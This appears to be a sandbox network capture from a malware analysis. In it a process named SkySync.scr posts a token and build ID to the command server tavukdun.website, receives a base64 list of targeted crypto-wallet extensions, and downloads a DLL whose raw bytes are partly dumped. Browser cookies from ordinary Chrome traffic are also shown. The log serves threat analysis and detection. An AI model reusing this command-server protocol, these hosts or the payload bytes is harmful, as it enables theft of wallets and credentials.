------DHDBGHCBAEGCBFHJEBFIContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------DHDBGHCBAEGCBFHJEBFIContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------DHDBGHCBAEGCBFHJEBFICont
2024-11-01 19:57:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:57:48 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.11.20	49805	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:57:48 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 7281 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:57:48 UTC	7281	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------BGDAAEHDHIIJKECBKEBACont
2024-11-01 19:57:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:57:49 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.11.20	49806	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:57:49 UTC	239	OUT	GET /sqlo.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:57:50 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:57:50 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Friday, 01-Nov-2024 19:57:50 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-11-01 19:57:50 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-11-01 19:57:50 UTC	16384	IN	Data Raw: 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-11-01 19:57:50 UTC	16384	IN	Data Raw: c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-11-01 19:57:50 UTC	16384	IN	Data Raw: 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 Data Ascii: wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$
2024-11-01 19:57:50 UTC	16384	IN	Data Raw: 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b Data Ascii: D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-11-01 19:57:50 UTC	16384	IN	Data Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-11-01 19:57:50 UTC	16384	IN	Data Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-11-01 19:57:50 UTC	16384	IN	Data Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-11-01 19:57:50 UTC	16384	IN	Data Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-11-01 19:57:51 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.11.20	49810	142.250.65.164	443	5204	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:57:54 UTC	807	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-11-01 19:57:54 UTC	1266	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 19:57:54 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-1KU5rd2XzIzA1h4xi5rtFA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-01 19:57:54 UTC	1266	IN	Data Raw: 63 35 66 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6d 6f 6e 73 74 65 72 20 68 75 6e 74 65 72 20 77 69 6c 64 73 20 62 65 74 61 22 2c 22 6e 65 74 66 6c 69 78 20 74 68 65 20 64 69 70 6c 6f 6d 61 74 20 73 65 61 73 6f 6e 20 33 22 2c 22 62 6f 65 69 6e 67 20 73 74 72 69 6b 65 20 63 6f 6e 74 72 61 63 74 20 6f 66 66 65 72 22 2c 22 62 72 61 7a 69 6c 69 61 6e 20 67 72 61 6e 64 20 70 72 69 78 22 2c 22 68 61 77 61 69 69 20 6d 61 75 6e 61 20 6b 65 61 20 73 6e 6f 77 66 61 6c 6c 22 2c 22 77 6f 72 64 6c 65 20 74 6f 64 61 79 20 6e 6f 76 65 6d 62 65 72 20 31 22 2c 22 66 72 65 64 64 69 65 20 66 72 65 65 6d 61 6e 20 77 6f 72 6c 64 20 73 65 72 69 65 73 20 6d 76 70 73 22 2c 22 77 61 6c 6d 61 72 74 20 62 6c 61 63 6b 20 66 72 69 64 61 79 20 73 61 6c 65 73 22 5d 2c 5b 22 22 2c 22 22 Data Ascii: c5f)]}'["",["monster hunter wilds beta","netflix the diplomat season 3","boeing strike contract offer","brazilian grand prix","hawaii mauna kea snowfall","wordle today november 1","freddie freeman world series mvps","walmart black friday sales"],["",""
2024-11-01 19:57:54 UTC	1266	IN	Data Raw: 68 61 6d 77 78 55 6c 6c 71 56 45 68 49 56 6d 4a 73 54 31 4d 78 53 6d 56 57 62 6a 68 30 4d 30 5a 61 63 45 39 68 4e 54 46 74 62 58 64 55 54 32 74 74 4e 47 52 47 53 44 6b 78 63 47 4d 76 63 30 38 30 4f 57 5a 73 56 6e 42 32 57 44 45 30 59 31 56 56 62 32 6c 58 62 32 74 42 63 56 41 35 65 6e 64 43 65 56 51 7a 64 55 74 69 59 56 6b 78 55 6d 52 30 55 56 52 57 5a 47 78 45 61 6b 34 79 4f 57 34 33 4e 6c 56 76 53 30 64 55 4e 55 70 48 5a 57 5a 76 54 33 41 31 65 46 52 44 4e 47 46 56 4d 43 39 51 59 6b 52 6d 4f 45 39 36 52 31 49 72 53 6b 31 52 53 57 45 7a 4b 31 63 33 59 55 31 74 62 57 4a 46 5a 54 4d 79 61 54 4a 73 63 45 64 34 62 55 4d 79 61 6b 63 77 62 6e 56 77 53 47 6f 33 4b 31 42 74 59 58 42 72 59 33 56 79 4e 6d 35 5a 55 6b 74 70 63 6d 39 49 55 6b 68 72 65 46 64 6a 5a 54 Data Ascii: hamwxUllqVEhIVmJsT1MxSmVWbjh0M0ZacE9hNTFtbXdUT2ttNGRGSDkxcGMvc080OWZsVnB2WDE0Y1VVb2lXb2tBcVA5endCeVQzdUtiYVkxUmR0UVRWZGxEak4yOW43NlVvS0dUNUpHZWZvT3A1eFRDNGFVMC9QYkRmOE96R1IrSk1RSWEzK1c3YU1tbWJFZTMyaTJscEd4bUMyakcwbnVwSGo3K1BtYXBrY3VyNm5ZUktpcm9IUkhreFdjZT
2024-11-01 19:57:54 UTC	642	IN	Data Raw: 33 4a 73 63 55 68 6f 5a 6b 78 7a 4f 53 74 51 5a 6a 56 58 56 6a 42 56 62 46 68 4e 53 6a 56 7a 51 57 4a 45 64 31 4a 53 55 6c 4a 55 64 47 4a 72 56 56 56 56 56 6b 5a 46 52 56 70 48 52 48 68 59 54 6e 42 6f 63 47 74 78 54 46 52 54 52 55 5a 59 65 45 5a 4c 55 55 30 76 54 33 5a 30 52 6c 5a 77 52 6a 63 79 65 57 39 32 5a 45 5a 47 52 6c 64 76 64 69 39 61 4f 68 52 43 63 6d 46 36 61 57 78 70 59 57 34 67 52 33 4a 68 62 6d 51 67 55 48 4a 70 65 45 6f 48 49 7a 45 30 4d 54 49 35 5a 46 4a 42 5a 33 4e 66 63 33 4e 77 50 57 56 4b 65 6d 6f 30 64 46 52 51 4d 56 52 6a 64 30 35 7a 4d 47 39 36 65 6c 5a 6e 4f 55 4a 4b 53 6b 74 72 63 58 4e 35 63 33 70 4b 56 45 31 34 56 46 4e 44 4f 55 74 36 52 58 52 53 53 30 4e 71 53 33 4a 42 51 55 46 79 61 48 4e 4d 53 46 46 77 42 77 5c 75 30 30 33 64 Data Ascii: 3JscUhoZkxzOStQZjVXVjBVbFhNSjVzQWJEd1JSUlJUdGJrVVVVVkZFRVpHRHhYTnBocGtxTFRTRUZYeEZLUU0vT3Z0RlZwRjcyeW92ZEZGRldvdi9aOhRCcmF6aWxpYW4gR3JhbmQgUHJpeEoHIzE0MTI5ZFJBZ3Nfc3NwPWVKemo0dFRQMVRjd05zMG96elZnOUJKSktrcXN5c3pKVE14VFNDOUt6RXRSS0NqS3JBQUFyaHNMSFFwBw\u003d
2024-11-01 19:57:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.11.20	49812	142.250.65.164	443	5204	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:57:54 UTC	710	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-11-01 19:57:55 UTC	845	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJblGMPllLkGIjDv19O-TQaehGs4CSEAsU7rd1JcKOqllDHwYGF3Bb1cH04t-5z9nPXgYmFTY64XsCcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIw-WUuQYQ0N-RyAESBL9gluU Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Date: Fri, 01 Nov 2024 19:57:55 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-01 19:57:55 UTC	410	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has 